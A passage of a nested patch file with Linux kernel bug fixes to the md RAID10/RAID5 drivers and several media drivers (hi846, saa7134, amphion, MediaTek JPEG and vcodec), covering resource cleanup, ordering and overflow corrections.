+ 	return false;
+ }
+@@ -1244,7 +1248,8 @@ static void raid10_read_request(struct mddev *mddev, struct bio *bio,
+ 	}
+ 	slot = r10_bio->read_slot;
+ 
+-	if (blk_queue_io_stat(bio->bi_bdev->bd_disk->queue))
++	if (!r10_bio->start_time &&
++	    blk_queue_io_stat(bio->bi_bdev->bd_disk->queue))
+ 		r10_bio->start_time = bio_start_io_acct(bio);
+ 	read_bio = bio_alloc_clone(rdev->bdev, bio, gfp, &mddev->bio_set);
+ 
+@@ -1574,6 +1579,7 @@ static void __make_request(struct mddev *mddev, struct bio *bio, int sectors)
+ 	r10_bio->sector = bio->bi_iter.bi_sector;
+ 	r10_bio->state = 0;
+ 	r10_bio->read_slot = -1;
++	r10_bio->start_time = 0;
+ 	memset(r10_bio->devs, 0, sizeof(r10_bio->devs[0]) *
+ 			conf->geo.raid_disks);
+ 
+@@ -2609,11 +2615,22 @@ static void recovery_request_write(struct mddev *mddev, struct r10bio *r10_bio)
+ {
+ 	struct r10conf *conf = mddev->private;
+ 	int d;
+-	struct bio *wbio, *wbio2;
++	struct bio *wbio = r10_bio->devs[1].bio;
++	struct bio *wbio2 = r10_bio->devs[1].repl_bio;
++
++	/* Need to test wbio2->bi_end_io before we call
++	 * submit_bio_noacct as if the former is NULL,
++	 * the latter is free to free wbio2.
++	 */
++	if (wbio2 && !wbio2->bi_end_io)
++		wbio2 = NULL;
+ 
+ 	if (!test_bit(R10BIO_Uptodate, &r10_bio->state)) {
+ 		fix_recovery_read_error(r10_bio);
+-		end_sync_request(r10_bio);
++		if (wbio->bi_end_io)
++			end_sync_request(r10_bio);
++		if (wbio2)
++			end_sync_request(r10_bio);
+ 		return;
+ 	}
+ 
+@@ -2622,14 +2639,6 @@ static void recovery_request_write(struct mddev *mddev, struct r10bio *r10_bio)
+ 	 * and submit the write request
+ 	 */
+ 	d = r10_bio->devs[1].devnum;
+-	wbio = r10_bio->devs[1].bio;
+-	wbio2 = r10_bio->devs[1].repl_bio;
+-	/* Need to test wbio2->bi_end_io before we call
+-	 * submit_bio_noacct as if the former is NULL,
+-	 * the latter is free to free wbio2.
+-	 */
+-	if (wbio2 && !wbio2->bi_end_io)
+-		wbio2 = NULL;
+ 	if (wbio->bi_end_io) {
+ 		atomic_inc(&conf->mirrors[d].rdev->nr_pending);
+ 		md_sync_acct(conf->mirrors[d].rdev->bdev, bio_sectors(wbio));
+@@ -2978,9 +2987,13 @@ static void handle_read_error(struct mddev *mddev, struct r10bio *r10_bio)
+ 		md_error(mddev, rdev);
+ 
+ 	rdev_dec_pending(rdev, mddev);
+-	allow_barrier(conf);
+ 	r10_bio->state = 0;
+ 	raid10_read_request(mddev, r10_bio->master_bio, r10_bio);
++	/*
++	 * allow_barrier after re-submit to ensure no sync io
++	 * can be issued while regular io pending.
++	 */
++	allow_barrier(conf);
+ }
+ 
+ static void handle_write_completed(struct r10conf *conf, struct r10bio *r10_bio)
+@@ -3289,10 +3302,6 @@ static sector_t raid10_sync_request(struct mddev *mddev, sector_t sector_nr,
+ 	sector_t chunk_mask = conf->geo.chunk_mask;
+ 	int page_idx = 0;
+ 
+-	if (!mempool_initialized(&conf->r10buf_pool))
+-		if (init_resync(conf))
+-			return 0;
+-
+ 	/*
+ 	 * Allow skipping a full rebuild for incremental assembly
+ 	 * of a clean array, like RAID1 does.
+@@ -3308,6 +3317,10 @@ static sector_t raid10_sync_request(struct mddev *mddev, sector_t sector_nr,
+ 		return mddev->dev_sectors - sector_nr;
+ 	}
+ 
++	if (!mempool_initialized(&conf->r10buf_pool))
++		if (init_resync(conf))
++			return 0;
++
+  skipped:
+ 	max_sector = mddev->dev_sectors;
+ 	if (test_bit(MD_RECOVERY_SYNC, &mddev->recovery) ||
+@@ -4004,6 +4017,20 @@ static int setup_geo(struct geom *geo, struct mddev *mddev, enum geo_type new)
+ 	return nc*fc;
+ }
+ 
++static void raid10_free_conf(struct r10conf *conf)
++{
++	if (!conf)
++		return;
++
++	mempool_exit(&conf->r10bio_pool);
++	kfree(conf->mirrors);
++	kfree(conf->mirrors_old);
++	kfree(conf->mirrors_new);
++	safe_put_page(conf->tmppage);
++	bioset_exit(&conf->bio_split);
++	kfree(conf);
++}
++
+ static struct r10conf *setup_conf(struct mddev *mddev)
+ {
+ 	struct r10conf *conf = NULL;
+@@ -4086,13 +4113,7 @@ static struct r10conf *setup_conf(struct mddev *mddev)
+ 	return conf;
+ 
+  out:
+-	if (conf) {
+-		mempool_exit(&conf->r10bio_pool);
+-		kfree(conf->mirrors);
+-		safe_put_page(conf->tmppage);
+-		bioset_exit(&conf->bio_split);
+-		kfree(conf);
+-	}
++	raid10_free_conf(conf);
+ 	return ERR_PTR(err);
+ }
+ 
+@@ -4129,6 +4150,9 @@ static int raid10_run(struct mddev *mddev)
+ 	if (!conf)
+ 		goto out;
+ 
++	mddev->thread = conf->thread;
++	conf->thread = NULL;
++
+ 	if (mddev_is_clustered(conf->mddev)) {
+ 		int fc, fo;
+ 
+@@ -4141,9 +4165,6 @@ static int raid10_run(struct mddev *mddev)
+ 		}
+ 	}
+ 
+-	mddev->thread = conf->thread;
+-	conf->thread = NULL;
+-
+ 	if (mddev->queue) {
+ 		blk_queue_max_write_zeroes_sectors(mddev->queue, 0);
+ 		blk_queue_io_min(mddev->queue, mddev->chunk_sectors << 9);
+@@ -4283,10 +4304,7 @@ static int raid10_run(struct mddev *mddev)
+ 
+ out_free_conf:
+ 	md_unregister_thread(&mddev->thread);
+-	mempool_exit(&conf->r10bio_pool);
+-	safe_put_page(conf->tmppage);
+-	kfree(conf->mirrors);
+-	kfree(conf);
++	raid10_free_conf(conf);
+ 	mddev->private = NULL;
+ out:
+ 	return -EIO;
+@@ -4294,15 +4312,7 @@ out:
+ 
+ static void raid10_free(struct mddev *mddev, void *priv)
+ {
+-	struct r10conf *conf = priv;
+-
+-	mempool_exit(&conf->r10bio_pool);
+-	safe_put_page(conf->tmppage);
+-	kfree(conf->mirrors);
+-	kfree(conf->mirrors_old);
+-	kfree(conf->mirrors_new);
+-	bioset_exit(&conf->bio_split);
+-	kfree(conf);
++	raid10_free_conf(priv);
+ }
+ 
+ static void raid10_quiesce(struct mddev *mddev, int quiesce)
+diff --git a/drivers/md/raid5.c b/drivers/md/raid5.c
+index 7b820b81d8c2b..f787c9e5b10e7 100644
+--- a/drivers/md/raid5.c
++++ b/drivers/md/raid5.c
+@@ -6079,6 +6079,38 @@ out_release:
+ 	return ret;
+ }
+ 
++/*
++ * If the bio covers multiple data disks, find sector within the bio that has
++ * the lowest chunk offset in the first chunk.
++ */
++static sector_t raid5_bio_lowest_chunk_sector(struct r5conf *conf,
++					      struct bio *bi)
++{
++	int sectors_per_chunk = conf->chunk_sectors;
++	int raid_disks = conf->raid_disks;
++	int dd_idx;
++	struct stripe_head sh;
++	unsigned int chunk_offset;
++	sector_t r_sector = bi->bi_iter.bi_sector & ~((sector_t)RAID5_STRIPE_SECTORS(conf)-1);
++	sector_t sector;
++
++	/* We pass in fake stripe_head to get back parity disk numbers */
++	sector = raid5_compute_sector(conf, r_sector, 0, &dd_idx, &sh);
++	chunk_offset = sector_div(sector, sectors_per_chunk);
++	if (sectors_per_chunk - chunk_offset >= bio_sectors(bi))
++		return r_sector;
++	/*
++	 * Bio crosses to the next data disk. Check whether it's in the same
++	 * chunk.
++	 */
++	dd_idx++;
++	while (dd_idx == sh.pd_idx || dd_idx == sh.qd_idx)
++		dd_idx++;
++	if (dd_idx >= raid_disks)
++		return r_sector;
++	return r_sector + sectors_per_chunk - chunk_offset;
++}
++
+ static bool raid5_make_request(struct mddev *mddev, struct bio * bi)
+ {
+ 	DEFINE_WAIT_FUNC(wait, woken_wake_function);
+@@ -6150,6 +6182,17 @@ static bool raid5_make_request(struct mddev *mddev, struct bio * bi)
+ 	}
+ 	md_account_bio(mddev, &bi);
+ 
++	/*
++	 * Lets start with the stripe with the lowest chunk offset in the first
++	 * chunk. That has the best chances of creating IOs adjacent to
++	 * previous IOs in case of sequential IO and thus creates the most
++	 * sequential IO pattern. We don't bother with the optimization when
++	 * reshaping as the performance benefit is not worth the complexity.
++	 */
++	if (likely(conf->reshape_progress == MaxSector))
++		logical_sector = raid5_bio_lowest_chunk_sector(conf, bi);
++	s = (logical_sector - ctx.first_sector) >> RAID5_STRIPE_SHIFT(conf);
++
+ 	add_wait_queue(&conf->wait_for_overlap, &wait);
+ 	while (1) {
+ 		res = make_stripe_request(mddev, conf, &ctx, logical_sector,
+@@ -6178,7 +6221,7 @@ static bool raid5_make_request(struct mddev *mddev, struct bio * bi)
+ 			continue;
+ 		}
+ 
+-		s = find_first_bit(ctx.sectors_to_do, stripe_cnt);
++		s = find_next_bit_wrap(ctx.sectors_to_do, stripe_cnt, s);
+ 		if (s == stripe_cnt)
+ 			break;
+ 
+diff --git a/drivers/media/i2c/hi846.c b/drivers/media/i2c/hi846.c
+index 7c61873b71981..306dc35e925fd 100644
+--- a/drivers/media/i2c/hi846.c
++++ b/drivers/media/i2c/hi846.c
+@@ -1472,21 +1472,26 @@ static int hi846_init_controls(struct hi846 *hi846)
+ 	if (ctrl_hdlr->error) {
+ 		dev_err(&client->dev, "v4l ctrl handler error: %d\n",
+ 			ctrl_hdlr->error);
+-		return ctrl_hdlr->error;
++		ret = ctrl_hdlr->error;
++		goto error;
+ 	}
+ 
+ 	ret = v4l2_fwnode_device_parse(&client->dev, &props);
+ 	if (ret)
+-		return ret;
++		goto error;
+ 
+ 	ret = v4l2_ctrl_new_fwnode_properties(ctrl_hdlr, &hi846_ctrl_ops,
+ 					      &props);
+ 	if (ret)
+-		return ret;
++		goto error;
+ 
+ 	hi846->sd.ctrl_handler = ctrl_hdlr;
+ 
+ 	return 0;
++
++error:
++	v4l2_ctrl_handler_free(ctrl_hdlr);
++	return ret;
+ }
+ 
+ static int hi846_set_video_mode(struct hi846 *hi846, int fps)
+diff --git a/drivers/media/i2c/max9286.c b/drivers/media/i2c/max9286.c
+index d034a67042e35..892cd97b7cab7 100644
+--- a/drivers/media/i2c/max9286.c
++++ b/drivers/media/i2c/max9286.c
+@@ -941,6 +941,7 @@ err_async:
+ static void max9286_v4l2_unregister(struct max9286_priv *priv)
+ {
+ 	fwnode_handle_put(priv->sd.fwnode);
++	v4l2_ctrl_handler_free(&priv->ctrls);
+ 	v4l2_async_unregister_subdev(&priv->sd);
+ 	max9286_v4l2_notifier_unregister(priv);
+ }
+diff --git a/drivers/media/i2c/ov8856.c b/drivers/media/i2c/ov8856.c
+index cf8384e09413b..b5c7881383ca7 100644
+--- a/drivers/media/i2c/ov8856.c
++++ b/drivers/media/i2c/ov8856.c
+@@ -1709,46 +1709,6 @@ static int ov8856_identify_module(struct ov8856 *ov8856)
+ 		return -ENXIO;
+ 	}
+ 
+-	ret = ov8856_write_reg(ov8856, OV8856_REG_MODE_SELECT,
+-			       OV8856_REG_VALUE_08BIT, OV8856_MODE_STREAMING);
+-	if (ret)
+-		return ret;
+-
+-	ret = ov8856_write_reg(ov8856, OV8856_OTP_MODE_CTRL,
+-			       OV8856_REG_VALUE_08BIT, OV8856_OTP_MODE_AUTO);
+-	if (ret) {
+-		dev_err(&client->dev, "failed to set otp mode");
+-		return ret;
+-	}
+-
+-	ret = ov8856_write_reg(ov8856, OV8856_OTP_LOAD_CTRL,
+-			       OV8856_REG_VALUE_08BIT,
+-			       OV8856_OTP_LOAD_CTRL_ENABLE);
+-	if (ret) {
+-		dev_err(&client->dev, "failed to enable load control");
+-		return ret;
+-	}
+-
+-	ret = ov8856_read_reg(ov8856, OV8856_MODULE_REVISION,
+-			      OV8856_REG_VALUE_08BIT, &val);
+-	if (ret) {
+-		dev_err(&client->dev, "failed to read module revision");
+-		return ret;
+-	}
+-
+-	dev_info(&client->dev, "OV8856 revision %x (%s) at address 0x%02x\n",
+-		 val,
+-		 val == OV8856_2A_MODULE ? "2A" :
+-		 val == OV8856_1B_MODULE ? "1B" : "unknown revision",
+-		 client->addr);
+-
+-	ret = ov8856_write_reg(ov8856, OV8856_REG_MODE_SELECT,
+-			       OV8856_REG_VALUE_08BIT, OV8856_MODE_STANDBY);
+-	if (ret) {
+-		dev_err(&client->dev, "failed to exit streaming mode");
+-		return ret;
+-	}
+-
+ 	ov8856->identified = true;
+ 
+ 	return 0;
+diff --git a/drivers/media/pci/dm1105/dm1105.c b/drivers/media/pci/dm1105/dm1105.c
+index 4ac645a56c14e..9e9c7c071accc 100644
+--- a/drivers/media/pci/dm1105/dm1105.c
++++ b/drivers/media/pci/dm1105/dm1105.c
+@@ -1176,6 +1176,7 @@ static void dm1105_remove(struct pci_dev *pdev)
+ 	struct dvb_demux *dvbdemux = &dev->demux;
+ 	struct dmx_demux *dmx = &dvbdemux->dmx;
+ 
++	cancel_work_sync(&dev->ir.work);
+ 	dm1105_ir_exit(dev);
+ 	dmx->close(dmx);
+ 	dvb_net_release(&dev->dvbnet);
+diff --git a/drivers/media/pci/saa7134/saa7134-ts.c b/drivers/media/pci/saa7134/saa7134-ts.c
+index 6a5053126237f..437dbe5e75e29 100644
+--- a/drivers/media/pci/saa7134/saa7134-ts.c
++++ b/drivers/media/pci/saa7134/saa7134-ts.c
+@@ -300,6 +300,7 @@ int saa7134_ts_start(struct saa7134_dev *dev)
+ 
+ int saa7134_ts_fini(struct saa7134_dev *dev)
+ {
++	del_timer_sync(&dev->ts_q.timeout);
+ 	saa7134_pgtable_free(dev->pci, &dev->ts_q.pt);
+ 	return 0;
+ }
+diff --git a/drivers/media/pci/saa7134/saa7134-vbi.c b/drivers/media/pci/saa7134/saa7134-vbi.c
+index 3f0b0933eed69..3e773690468bd 100644
+--- a/drivers/media/pci/saa7134/saa7134-vbi.c
++++ b/drivers/media/pci/saa7134/saa7134-vbi.c
+@@ -185,6 +185,7 @@ int saa7134_vbi_init1(struct saa7134_dev *dev)
+ int saa7134_vbi_fini(struct saa7134_dev *dev)
+ {
+ 	/* nothing */
++	del_timer_sync(&dev->vbi_q.timeout);
+ 	return 0;
+ }
+ 
+diff --git a/drivers/media/pci/saa7134/saa7134-video.c b/drivers/media/pci/saa7134/saa7134-video.c
+index 4d8974c9fcc98..29124756a62bc 100644
+--- a/drivers/media/pci/saa7134/saa7134-video.c
++++ b/drivers/media/pci/saa7134/saa7134-video.c
+@@ -2146,6 +2146,7 @@ int saa7134_video_init1(struct saa7134_dev *dev)
+ 
+ void saa7134_video_fini(struct saa7134_dev *dev)
+ {
++	del_timer_sync(&dev->video_q.timeout);
+ 	/* free stuff */
+ 	saa7134_pgtable_free(dev->pci, &dev->video_q.pt);
+ 	saa7134_pgtable_free(dev->pci, &dev->vbi_q.pt);
+diff --git a/drivers/media/platform/amphion/vdec.c b/drivers/media/platform/amphion/vdec.c
+index 87f9f8e90ab13..70633530d23a1 100644
+--- a/drivers/media/platform/amphion/vdec.c
++++ b/drivers/media/platform/amphion/vdec.c
+@@ -168,7 +168,31 @@ static const struct vpu_format vdec_formats[] = {
+ 	{0, 0, 0, 0},
+ };
+ 
++static int vdec_op_s_ctrl(struct v4l2_ctrl *ctrl)
++{
++	struct vpu_inst *inst = ctrl_to_inst(ctrl);
++	struct vdec_t *vdec = inst->priv;
++	int ret = 0;
++
++	vpu_inst_lock(inst);
++	switch (ctrl->id) {
++	case V4L2_CID_MPEG_VIDEO_DEC_DISPLAY_DELAY_ENABLE:
++		vdec->params.display_delay_enable = ctrl->val;
++		break;
++	case V4L2_CID_MPEG_VIDEO_DEC_DISPLAY_DELAY:
++		vdec->params.display_delay = ctrl->val;
++		break;
++	default:
++		ret = -EINVAL;
++		break;
++	}
++	vpu_inst_unlock(inst);
++
++	return ret;
++}
++
+ static const struct v4l2_ctrl_ops vdec_ctrl_ops = {
++	.s_ctrl = vdec_op_s_ctrl,
+ 	.g_volatile_ctrl = vpu_helper_g_volatile_ctrl,
+ };
+ 
+@@ -181,6 +205,14 @@ static int vdec_ctrl_init(struct vpu_inst *inst)
+ 	if (ret)
+ 		return ret;
+ 
++	v4l2_ctrl_new_std(&inst->ctrl_handler, &vdec_ctrl_ops,
++			  V4L2_CID_MPEG_VIDEO_DEC_DISPLAY_DELAY,
++			  0, 0, 1, 0);
++
++	v4l2_ctrl_new_std(&inst->ctrl_handler, &vdec_ctrl_ops,
++			  V4L2_CID_MPEG_VIDEO_DEC_DISPLAY_DELAY_ENABLE,
++			  0, 1, 1, 0);
++
+ 	ctrl = v4l2_ctrl_new_std(&inst->ctrl_handler, &vdec_ctrl_ops,
+ 				 V4L2_CID_MIN_BUFFERS_FOR_CAPTURE, 1, 32, 1, 2);
+ 	if (ctrl)
+diff --git a/drivers/media/platform/amphion/vpu_codec.h b/drivers/media/platform/amphion/vpu_codec.h
+index 528a93f08ecd4..bac6d0d94f8a5 100644
+--- a/drivers/media/platform/amphion/vpu_codec.h
++++ b/drivers/media/platform/amphion/vpu_codec.h
+@@ -55,7 +55,8 @@ struct vpu_encode_params {
+ struct vpu_decode_params {
+ 	u32 codec_format;
+ 	u32 output_format;
+-	u32 b_dis_reorder;
++	u32 display_delay_enable;
++	u32 display_delay;
+ 	u32 b_non_frame;
+ 	u32 frame_count;
+ 	u32 end_flag;
+diff --git a/drivers/media/platform/amphion/vpu_malone.c b/drivers/media/platform/amphion/vpu_malone.c
+index 2c9bfc6a5a72e..feb5c25e31044 100644
+--- a/drivers/media/platform/amphion/vpu_malone.c
++++ b/drivers/media/platform/amphion/vpu_malone.c
+@@ -641,7 +641,9 @@ static int vpu_malone_set_params(struct vpu_shared_addr *shared,
+ 		hc->jpg[instance].jpg_mjpeg_interlaced = 0;
+ 	}
+ 
+-	hc->codec_param[instance].disp_imm = params->b_dis_reorder ? 1 : 0;
++	hc->codec_param[instance].disp_imm = params->display_delay_enable ? 1 : 0;
++	if (malone_format != MALONE_FMT_AVC)
++		hc->codec_param[instance].disp_imm = 0;
+ 	hc->codec_param[instance].dbglog_enable = 0;
+ 	iface->dbglog_desc.level = 0;
+ 
+diff --git a/drivers/media/platform/mediatek/jpeg/mtk_jpeg_core.c b/drivers/media/platform/mediatek/jpeg/mtk_jpeg_core.c
+index 969516a940ba7..d9584fe5033eb 100644
+--- a/drivers/media/platform/mediatek/jpeg/mtk_jpeg_core.c
++++ b/drivers/media/platform/mediatek/jpeg/mtk_jpeg_core.c
+@@ -1025,9 +1025,6 @@ retry_select:
+ 	if (!dst_buf)
+ 		goto getbuf_fail;
+ 
+-	v4l2_m2m_src_buf_remove(ctx->fh.m2m_ctx);
+-	v4l2_m2m_dst_buf_remove(ctx->fh.m2m_ctx);
+-
+ 	v4l2_m2m_buf_copy_metadata(src_buf, dst_buf, true);
+ 
+ 	mtk_jpegenc_set_hw_param(ctx, hw_id, src_buf, dst_buf);
+@@ -1045,6 +1042,9 @@ retry_select:
+ 		goto enc_end;
+ 	}
+ 
++	v4l2_m2m_src_buf_remove(ctx->fh.m2m_ctx);
++	v4l2_m2m_dst_buf_remove(ctx->fh.m2m_ctx);
++
+ 	schedule_delayed_work(&comp_jpeg[hw_id]->job_timeout_work,
+ 			      msecs_to_jiffies(MTK_JPEG_HW_TIMEOUT_MSEC));
+ 
+@@ -1220,9 +1220,6 @@ retry_select:
+ 	if (!dst_buf)
+ 		goto getbuf_fail;
+ 
+-	v4l2_m2m_src_buf_remove(ctx->fh.m2m_ctx);
+-	v4l2_m2m_dst_buf_remove(ctx->fh.m2m_ctx);
+-
+ 	v4l2_m2m_buf_copy_metadata(src_buf, dst_buf, true);
+ 	jpeg_src_buf = mtk_jpeg_vb2_to_srcbuf(&src_buf->vb2_buf);
+ 	jpeg_dst_buf = mtk_jpeg_vb2_to_srcbuf(&dst_buf->vb2_buf);
+@@ -1231,7 +1228,7 @@ retry_select:
+ 					     &jpeg_src_buf->dec_param)) {
+ 		mtk_jpeg_queue_src_chg_event(ctx);
+ 		ctx->state = MTK_JPEG_SOURCE_CHANGE;
+-		goto dec_end;
++		goto getbuf_fail;
+ 	}
+ 
+ 	jpeg_src_buf->curr_ctx = ctx;
+@@ -1254,6 +1251,9 @@ retry_select:
+ 		goto clk_end;
+ 	}
+ 
++	v4l2_m2m_src_buf_remove(ctx->fh.m2m_ctx);
++	v4l2_m2m_dst_buf_remove(ctx->fh.m2m_ctx);
++
+ 	schedule_delayed_work(&comp_jpeg[hw_id]->job_timeout_work,
+ 			      msecs_to_jiffies(MTK_JPEG_HW_TIMEOUT_MSEC));
+ 
+@@ -1692,7 +1692,7 @@ static int mtk_jpeg_probe(struct platform_device *pdev)
+ 		return -EINVAL;
+ 	}
+ 
+-	if (list_empty(&pdev->dev.devres_head)) {
++	if (!jpeg->variant->multi_core) {
+ 		INIT_DELAYED_WORK(&jpeg->job_timeout_work,
+ 				  mtk_jpeg_job_timeout_work);
+ 
+@@ -1874,6 +1874,7 @@ static const struct mtk_jpeg_variant mtk_jpeg_drvdata = {
+ 	.ioctl_ops = &mtk_jpeg_enc_ioctl_ops,
+ 	.out_q_default_fourcc = V4L2_PIX_FMT_YUYV,
+ 	.cap_q_default_fourcc = V4L2_PIX_FMT_JPEG,
++	.multi_core = false,
+ };
+ 
+ static struct mtk_jpeg_variant mtk8195_jpegenc_drvdata = {
+@@ -1885,6 +1886,7 @@ static struct mtk_jpeg_variant mtk8195_jpegenc_drvdata = {
+ 	.ioctl_ops = &mtk_jpeg_enc_ioctl_ops,
+ 	.out_q_default_fourcc = V4L2_PIX_FMT_YUYV,
+ 	.cap_q_default_fourcc = V4L2_PIX_FMT_JPEG,
++	.multi_core = true,
+ };
+ 
+ static const struct mtk_jpeg_variant mtk8195_jpegdec_drvdata = {
+@@ -1896,6 +1898,7 @@ static const struct mtk_jpeg_variant mtk8195_jpegdec_drvdata = {
+ 	.ioctl_ops = &mtk_jpeg_dec_ioctl_ops,
+ 	.out_q_default_fourcc = V4L2_PIX_FMT_JPEG,
+ 	.cap_q_default_fourcc = V4L2_PIX_FMT_YUV420M,
++	.multi_core = true,
+ };
+ 
+ #if defined(CONFIG_OF)
+diff --git a/drivers/media/platform/mediatek/jpeg/mtk_jpeg_core.h b/drivers/media/platform/mediatek/jpeg/mtk_jpeg_core.h
+index b9126476be8fa..f87358cc9f47f 100644
+--- a/drivers/media/platform/mediatek/jpeg/mtk_jpeg_core.h
++++ b/drivers/media/platform/mediatek/jpeg/mtk_jpeg_core.h
+@@ -60,6 +60,7 @@ enum mtk_jpeg_ctx_state {
+  * @ioctl_ops:			the callback of jpeg v4l2_ioctl_ops
+  * @out_q_default_fourcc:	output queue default fourcc
+  * @cap_q_default_fourcc:	capture queue default fourcc
++ * @multi_core:		mark jpeg hw is multi_core or not
+  */
+ struct mtk_jpeg_variant {
+ 	struct clk_bulk_data *clks;
+@@ -74,6 +75,7 @@ struct mtk_jpeg_variant {
+ 	const struct v4l2_ioctl_ops *ioctl_ops;
+ 	u32 out_q_default_fourcc;
+ 	u32 cap_q_default_fourcc;
++	bool multi_core;
+ };
+ 
+ struct mtk_jpeg_src_buf {
+diff --git a/drivers/media/platform/mediatek/jpeg/mtk_jpeg_enc_hw.c b/drivers/media/platform/mediatek/jpeg/mtk_jpeg_enc_hw.c
+index 1bbb712d78d0e..867f4c1a09fa6 100644
+--- a/drivers/media/platform/mediatek/jpeg/mtk_jpeg_enc_hw.c
++++ b/drivers/media/platform/mediatek/jpeg/mtk_jpeg_enc_hw.c
+@@ -286,10 +286,6 @@ static irqreturn_t mtk_jpegenc_hw_irq_handler(int irq, void *priv)
+ 	mtk_jpegenc_put_buf(jpeg);
+ 	pm_runtime_put(ctx->jpeg->dev);
+ 	clk_disable_unprepare(jpeg->venc_clk.clks->clk);
+-	if (!list_empty(&ctx->fh.m2m_ctx->out_q_ctx.rdy_queue) ||
+-	    !list_empty(&ctx->fh.m2m_ctx->cap_q_ctx.rdy_queue)) {
+-		queue_work(master_jpeg->workqueue, &ctx->jpeg_work);
+-	}
+ 
+ 	jpeg->hw_state = MTK_JPEG_HW_IDLE;
+ 	wake_up(&master_jpeg->enc_hw_wq);
+diff --git a/drivers/media/platform/mediatek/mdp3/mtk-mdp3-m2m.c b/drivers/media/platform/mediatek/mdp3/mtk-mdp3-m2m.c
+index 5f74ea3b7a524..8612a48bde10f 100644
+--- a/drivers/media/platform/mediatek/mdp3/mtk-mdp3-m2m.c
++++ b/drivers/media/platform/mediatek/mdp3/mtk-mdp3-m2m.c
+@@ -566,7 +566,11 @@ static int mdp_m2m_open(struct file *file)
+ 		goto err_free_ctx;
+ 	}
+ 
+-	ctx->id = ida_alloc(&mdp->mdp_ida, GFP_KERNEL);
++	ret = ida_alloc(&mdp->mdp_ida, GFP_KERNEL);
++	if (ret < 0)
++		goto err_unlock_mutex;
++	ctx->id = ret;
++
+ 	ctx->mdp_dev = mdp;
+ 
+ 	v4l2_fh_init(&ctx->fh, vdev);
+@@ -617,6 +621,8 @@ err_release_handler:
+ 	v4l2_fh_del(&ctx->fh);
+ err_exit_fh:
+ 	v4l2_fh_exit(&ctx->fh);
++	ida_free(&mdp->mdp_ida, ctx->id);
++err_unlock_mutex:
+ 	mutex_unlock(&mdp->m2m_lock);
+ err_free_ctx:
+ 	kfree(ctx);
+diff --git a/drivers/media/platform/mediatek/mdp3/mtk-mdp3-regs.c b/drivers/media/platform/mediatek/mdp3/mtk-mdp3-regs.c
+index 4e84a37ecdfc1..36336d169bd91 100644
+--- a/drivers/media/platform/mediatek/mdp3/mtk-mdp3-regs.c
++++ b/drivers/media/platform/mediatek/mdp3/mtk-mdp3-regs.c
+@@ -4,6 +4,7 @@
+  * Author: Ping-Hsun Wu <ping-hsun.wu@mediatek.com>
+  */
+ 
++#include <linux/math64.h>
+ #include <media/v4l2-common.h>
+ #include <media/videobuf2-v4l2.h>
+ #include <media/videobuf2-dma-contig.h>
+@@ -428,14 +429,15 @@ const struct mdp_format *mdp_try_fmt_mplane(struct v4l2_format *f,
+ 		u32 bpl = pix_mp->plane_fmt[i].bytesperline;
+ 		u32 min_si, max_si;
+ 		u32 si = pix_mp->plane_fmt[i].sizeimage;
++		u64 di;
+ 
+ 		bpl = clamp(bpl, min_bpl, max_bpl);
+ 		pix_mp->plane_fmt[i].bytesperline = bpl;
+ 
+-		min_si = (bpl * pix_mp->height * fmt->depth[i]) /
+-			 fmt->row_depth[i];
+-		max_si = (bpl * s.max_height * fmt->depth[i]) /
+-			 fmt->row_depth[i];
++		di = (u64)bpl * pix_mp->height * fmt->depth[i];
++		min_si = (u32)div_u64(di, fmt->row_depth[i]);
++		di = (u64)bpl * s.max_height * fmt->depth[i];
++		max_si = (u32)div_u64(di, fmt->row_depth[i]);
+ 
+ 		si = clamp(si, min_si, max_si);
+ 		pix_mp->plane_fmt[i].sizeimage = si;
+diff --git a/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec.c b/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec.c
+index 641f533c417fd..c99705681a03e 100644
+--- a/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec.c
++++ b/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec.c
+@@ -39,10 +39,9 @@ static bool mtk_vdec_get_cap_fmt(struct mtk_vcodec_ctx *ctx, int format_index)
+ {
+ 	const struct mtk_vcodec_dec_pdata *dec_pdata = ctx->dev->vdec_pdata;
+ 	const struct mtk_video_fmt *fmt;
+-	struct mtk_q_data *q_data;
+ 	int num_frame_count = 0, i;
+-	bool ret = true;
+ 
++	fmt = &dec_pdata->vdec_formats[format_index];
+ 	for (i = 0; i < *dec_pdata->num_formats; i++) {
+ 		if (dec_pdata->vdec_formats[i].type != MTK_FMT_FRAME)
+ 			continue;
+@@ -50,27 +49,10 @@ static bool mtk_vdec_get_cap_fmt(struct mtk_vcodec_ctx *ctx, int format_index)
+ 		num_frame_count++;
+ 	}
+ 
+-	if (num_frame_count == 1)
++	if (num_frame_count == 1 || fmt->fourcc == V4L2_PIX_FMT_MM21)
+ 		return true;
+ 
+-	fmt = &dec_pdata->vdec_formats[format_index];
+-	q_data = &ctx->q_data[MTK_Q_DATA_SRC];
+-	switch (q_data->fmt->fourcc) {
+-	case V4L2_PIX_FMT_VP8_FRAME:
+-		if (fmt->fourcc == V4L2_PIX_FMT_MM21)
+-			ret = true;
+-		break;
+-	case V4L2_PIX_FMT_H264_SLICE:
+-	case V4L2_PIX_FMT_VP9_FRAME:
+-		if (fmt->fourcc == V4L2_PIX_FMT_MM21)
+-			ret = false;
+-		break;
+-	default:
+-		ret = true;
+-		break;
+-	}
+-
+-	return ret;
++	return false;
+ }
+ 
+ static struct mtk_q_data *mtk_vdec_get_q_data(struct mtk_vcodec_ctx *ctx,
+diff --git a/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec_drv.c b/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec_drv.c
+index 174a6eec2f549..42df901e8beb4 100644
+--- a/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec_drv.c
++++ b/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec_drv.c
+@@ -451,7 +451,8 @@ err_core_workq:
+ 	if (IS_VDEC_LAT_ARCH(dev->vdec_pdata->hw_arch))
+ 		destroy_workqueue(dev->core_workqueue);
+ err_res:
+-	pm_runtime_disable(dev->pm.dev);
++	if (!dev->vdec_pdata->is_subdev_supported)
++		pm_runtime_disable(dev->pm.dev);
+ err_dec_pm:
+ 	mtk_vcodec_fw_release(dev->fw_handler);
+ 	return ret;
+diff --git a/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec_hw.c b/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec_hw.c
+index 376db0e433d75..b753bf54ebd90 100644
+--- a/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec_hw.c
